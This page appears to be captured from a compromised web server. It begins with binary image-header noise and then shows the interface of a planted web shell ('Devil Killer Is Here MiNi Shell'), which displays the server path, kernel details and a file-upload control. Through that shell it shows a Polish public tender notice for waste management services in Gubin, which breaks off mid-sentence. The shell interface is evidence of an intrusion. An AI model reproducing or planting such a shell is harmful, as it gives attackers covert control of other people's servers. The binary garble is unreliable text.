JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221121/0044827401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Zagospodarowanie odpadów komunalnych pochodzących od właścicieli nieruchomości niezamieszkałych z terenu Gminy Gubin o statusie miejskim oraz z innych miejsc i terenów” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">PRZEDSIĘBIORSTWO USŁUG MIEJSKICH SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">PUM Gubin</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 970361280</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Śląska 36</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gubin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-620</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">68 455 82 82</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">swz@pumgubin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pumgubin.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Inne usługi publiczne </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Zagospodarowanie odpadów komunalnych pochodzących od właścicieli nieruchomości niezamieszkałych z terenu Gminy Gubin o statusie miejskim oraz z innych miejsc i terenów” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-46364e80-601f-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00448274</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://www.pumgubin.pl; https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/;<br/>epuap:/PUMGUBIN36/skrzynka</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się drogą elektroniczną przy użyciu miniPortalu https://miniportal.uzp.gov.pl/, ePUAPu:<br/>/PUMGUBIN36/skrzynka<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy:<br/>złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej<br/>przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania z miniPortalu dostępnym<br/>pod adresem https://miniportal.uzp.gov.pl/warunkiUslugi.aspx oraz Regulaminie ePUAP.<br/>4. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego,<br/>akceptuje warunki korzystania z miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje<br/>się korzystając z miniPortalu przestrzegać postanowień tego regulaminu.<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia i<br/>wycofania oferty oraz do komunikacji wynosi 150 MB.<br/>6. W postępowaniu o udzielenie zamówienia korespondencja elektroniczna (inna niż oferta Wykonawcy<br/>i załączniki do oferty) odbywa się elektronicznie za pośrednictwem dedykowanego formularza<br/>dostępnego na ePUAP oraz udostępnionego przez miniPortal(Formularz do komunikacji).<br/>Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana. We wszelkiej<br/>korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się<br/>numerem ogłoszenia (BZP).<br/>7. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej,<br/>email: swz@pumgubin.pl<br/>8. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń<br/>składane są przez Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki.<br/>Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, na adres email:<br/>swz@pumgubin.pl. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w<br/>rozporządzeniu Prezesa Rady Ministrów z dnia 31 grudnia 2020 r. (Dz. U poz. 2452).<br/>9. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy<br/>użyciu środków komunikacji elektronicznej, wskazanych w SWZ.<br/>10. W przypadku rozbieżności pomiędzy treścią niniejszej SWZ a treścią udzielanych odpowiedzi jako<br/>obowiązującą należy przyjąć treść pisma zawierającego późniejsze oświadczenie Zamawiającego.<br/>11. Zamawiający do bezpośredniego kontaktowania się z Wykonawcami upoważnił nw. osoby:<br/>Malwina Jędrzejek tel. 68 455 8270, Zbigniew Białkowski tel. 68 455 82 76.<br/>12. Godziny pracy PUM Sp. z o.o. w Gubinie (z wyłączeniem dni ustawowo wolnych od pracy):<br/>od godz. 7:00 do godz. 15:00<br/>13. Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ. Zamawiający<br/>zobowiązany jest udzielić wyjaśnień na zasadach i w terminach określonych w art. 284 ustawy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Państwa danych osobowych będzie.<br/>Kontakt pod adresem: Przedsiębiorstwo Usług Miejskich Spółka z o.o., ul. Śląska 36, 66-620 Gubin, nr<br/>tel. 68 455 82 82, mail: pum@pumgubin.pl<br/>2. Administrator wyznaczył Inspektora ochrony danych osobowych. Mogą się Państwo z nią<br/>kontaktować w sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw z tym<br/>związanych. Kontakt pod adresem: Przedsiębiorstwo Usług Miejskich Spółka z o.o., ul. Śląska 36, 66-<br/>620 Gubin, nr tel. 68 455 82 82, mail: pum@pumgubin.pl<br/>3. Państwa dane będą przetwarzane w celu przeprowadzenia procedury postępowania o udzielenie<br/>zamówienia publicznego na podstawie:<br/>a) ustawy z dnia 11 września 2019 roku Prawo zamówień publicznych<br/>b) rozporządzenia Ministra Rozwoju z dnia 26 lipca 2016 r. w sprawie rodzajów dokumentów, jakie<br/>może żądać Zamawiający od Wykonawcy w postępowaniu o udzielenie zamówienia<br/>c) rozporządzenie Prezesa Rady Ministrów z dnia 18 stycznia 2011 r. w sprawie instrukcji<br/>kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu<br/>działania archiwów zakładowych<br/>1. Państwa dane pozyskane w związku z postępowaniem o udzielenie zamówienia publicznego<br/>przechowywane będą przez okres 5 lat: od dnia zakończenia postępowania o udzielenie zamówienia.<br/>2. Odbiorcami Państwa danych osobowych będą wszystkie zainteresowane podmioty i osoby, gdyż co<br/>do zasady postępowanie o udzielenie zamówienia publicznego jest jawne. W szczególnych<br/>przypadkach, jeśli jest to uzasadnione ochroną prywatności zgodnie z art. 18 ust 5 pkt 1 i 2 ustawy z<br/>dnia 11 września 2019 r. Prawo zamówień publicznych dostęp do danych zostanie ograniczony.<br/>Ponadto odbiorcą danych mogą być podmioty z którymi Przedsiębiorstwo Usług Miejskich Spółka z<br/>o.o. w Gubinie zawarł umowy na korzystanie z udostępnianych przez nie systemów informatycznych w<br/>zakresie elektronicznego zarządzania dokumentacją wyłącznie w związku ze świadczeniem usług<br/>wsparcia technicznego i usuwaniem awarii. Odbiorców tych obowiązuje klauzula zachowania poufności<br/>pozyskanych w takich okolicznościach wszelkich danych, w tym danych osobowych.<br/>3. W odniesieniu do danych pozyskanych w związku z prowadzonym postępowaniem o udzielenie<br/>zamówienia publicznego przysługują Państwu następujące uprawnienia:<br/>a) prawo dostępu do swoich danych oraz otrzymania ich kopii;<br/>b) prawo do sprostowania (poprawiania) swoich danych;<br/>c) prawo do usunięcia danych osobowych, w sytuacji, gdy przetwarzanie danych nie następuje w celu<br/>związanym z przeprowadzeniem postępowania publicznego;<br/>d) prawo do ograniczenia przetwarzania danych, przy czym przepisy odrębne mogą wyłączyć możliwość skorzystania z tego prawa,<br/>e) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych (adres: ul. Stawki 2, 00<br/>– 193 Warszawa; tel. 22 860 70 86).<br/>4. Podanie danych osobowych jest warunkiem koniecznym do wzięcia udziału w postępowaniu o<br/>udzielnie zamówienia publicznego</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/N/7/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot (nazwa) zamówienia: „Zagospodarowanie odpadów komunalnych pochodzących<br/>od właścicieli nieruchomości niezamieszkałych z terenu Gminy Gubin o statusie miejskim oraz z<br/>innych miejsc i terenów” </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90533000-2 - Usługi gospodarki odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90510000-5 - Usuwanie i obróbka odpadów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje realizację zamówień polegających na powtórzeniu podobnych<br/>usług, o których mowa w art. 214 ust. 1 pkt 7 ustawy. Zakres zmówienia nie przekroczy 5% wartości<br/>zamówienia podstawowego i polegać będzie na wykonaniu podobnych usług objętych zamówieniem<br/>podstawowym. Zamawiający udzieli zamówienia pod warunkiem zaistnienia potrzeby po stronie<br/>Zamawiającego oraz pod warunkiem zapewnienia środków finansowych na ten cel oraz po<br/>przeprowadzeniu negocjacji z Wykonawcą.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena – znaczenie 60 %<br/>Odległość do Instalacji Przetwarzania Odpadów Komunalnych – znaczenie 40 %</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Odległość do Instalacji Przetwarzania Odpadów Komunalnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na<br/>podstawie art. 108 ust. 1 pkt. 1-6 ustawy Pzp ustawy.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu dotyczące:<br/>2.1. kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika<br/>to z odrębnych przepisów. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże,<br/>że:<br/>a) posiada aktualne zezwolenie na prowadzenie działalności w zakresie przetwarzania odpadów<br/>wydawane przez właściwy organ zgodnie z art. 41 ustawy o odpadach z dnia 14 grudnia 2012r.<br/>(t.j. Dz. U. z 2022r. poz. 699),<br/>b) instalacja do przetwarzania odpadów posiada status instalacji komunalnej, zgodnie z Ustawą<br/>z dnia 27 kwietnia 2001r. – Prawo ochrony środowiska (Dz. U. z 2021r. poz. 1973 z póź. zm.).<br/>Potwierdzeniem może być w szczególności odpowiedni akt prawa miejscowego wskazujący<br/>instalację do przetwarzania zmieszanych odpadów komunalnych oraz instalację do składowania<br/>odpadów powstających w procesie mechaniczno-biologicznego przetwarzania zmieszanych<br/>odpadów komunalnych oraz pozostałości z sortowania odpadów komunalnych przeznaczonych<br/>do składowania, jako instalację komunalną (status komunalnej instalacji przetwarzania odpadów<br/>komunalnych dla instalacji MBP, kompostowni, składowiska odpadów innych niż obojętne i<br/>niebezpieczne) c) wpis do rejestru, o którym mowa w art. 49 ustawy o odpadach z dnia 14<br/>grudnia 2012 r. w zakresie transportu odpadów – zezwalające na transport odpadów, w zakresie<br/>frakcji, których transport stanowi przedmiot niniejszego zamówienia.<br/>2.2. zdolności technicznej lub zawodowej: warunek zostanie spełniony, jeżeli w złożonych<br/>dokumentach i oświadczeniach Wykonawca jednoznacznie wykaże, że w okresie ostatnich<br/>trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy, w tym<br/>okresie, wykonywał, a w przypadku świadczeń okresowych lub ciągłych wykonuje usługi polegające na zagospodarowaniu odpadów komunalnych, wykonywanej w sposób ciągły, o<br/>łącznej masie odpadów komunalnych co najmniej 1 000 Mg/rok, że usługi te zostały wykonane<br/>lub są wykonywane należycie oraz, że dysponuje bazą magazynową wyposażoną w urządzenia<br/>do selektywnego gromadzenia odpadów. W przypadku aktualnie wykonywanych świadczeń<br/>ciągłych, Wykonawca musi wykazać, że w zrealizowanej dotąd części zagospodarował odpady<br/>komunalne o łącznej masie co najmniej 1 000 Mg/rok. Ocena spełnienia warunku nastąpi według<br/>formuły spełnia/nie spełnia na podstawie oświadczenia Wykonawcy „Wykaz świadczonych<br/>usług” (Załącznik Nr 3 do SWZ) oraz dokumentów załączonych do „Wykazu świadczonych<br/>usług).<br/>2.3. sytuacji ekonomicznej lub finansowej: Warunek zostanie spełniony, jeżeli w złożonych<br/>dokumentach i oświadczeniach Wykonawca jednoznacznie wykaże, że:<br/>a) ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z<br/>przedmiotem zamówienia w wysokości minimum: 300 000,00 zł. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) Aktualne na dzień składania ofert oświadczenie o braku podstaw do<br/>wykluczenia oraz spełnienia warunków udziału w postępowaniu. Informacje zawarte w oświadczeniu<br/>stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału<br/>w postępowaniu. Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania<br/>braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie w jakim powołuje się na<br/>ich zasoby, warunków udziału w postępowaniu, zamieszcza w oświadczeniu informacje o tych<br/>podmiotach. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te powinny<br/>potwierdzać spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie,<br/>w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak<br/>podstaw wykluczenia. b) Dokumenty od Wykonawcy, który polega na zdolnościach lub sytuacji innych<br/>podmiotów: w celu oceny czy Wykonawca polegając na zdolnościach lub sytuacji innych podmiotów na<br/>zasadach określonych w art. 118 ustawy, będzie dysponował niezbędnymi zasobami w stopniu<br/>umożliwiającym należyte wykonanie zamówienia publicznego oraz oceny, czy stosunek łączący<br/>Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, Zamawiający żąda<br/>dokumentów, które określają w szczególności: zakres dostępnych Wykonawcy zasobów innego<br/>podmiotu; sposób wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu<br/>zamówienia publicznego; zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia<br/>publicznego; czy podmiot, na zdolnościach którego Wykonawca polega w odniesieniu do warunków<br/>udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia,<br/>zrealizuje usługi, których wskazane zdolności dotyczą. Składane na wezwanie Zamawiającego:<br/>a)aktualnego zezwolenie na prowadzenie działalności w zakresie przetwarzania odpadów, wydane<br/>przez właściwy organ zgodnie z art. 41 ustawy o odpadach z dnia 14 grudnia 2012 r. (t.j. Dz. U. z 2022<br/>r. poz. 699 ze zm.); b) aktualnej informacji o statusie instalacji do przetwarzania odpadów, jako<br/>instalacji komunalnej; c)wpis do rejestru, o którym mowa w art. 49 ustawy o odpadach z dnia 14<br/>grudnia 2012 r. w zakresie transportu odpadów – zezwalające na transport odpadów, w zakresie<br/>frakcji, których transport stanowi przedmiot niniejszego zamówienia. d)dokumentu potwierdzającego,<br/>że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez Zamawiającego.<br/>e)wykazu świadczonych usług wykonanych nie wcześniej niż w okresie ostatnich 3 lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z<br/>podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których usługi te<br/>zostały wykonane, z załączeniem dowodów określających czy te usługi zostały wykonane należycie, w<br/>szczególności informacji o tym czy usługi zostały wykonane zgodnie z przepisami ustawy o utrzymaniu<br/>porządku i czystości w gminach oraz ustawy o odpadach, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane,<br/>a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać<br/>tych dokumentów – inne dokumenty; dokumenty potwierdzające ich należyte wykonywanie powinny<br/>być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu; f)informację o przynależności lub braku przynależności do<br/>tej samej grupy kapitałowej, o której mowa w art. 108 ust. 1 pkt 5 Pzp.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga 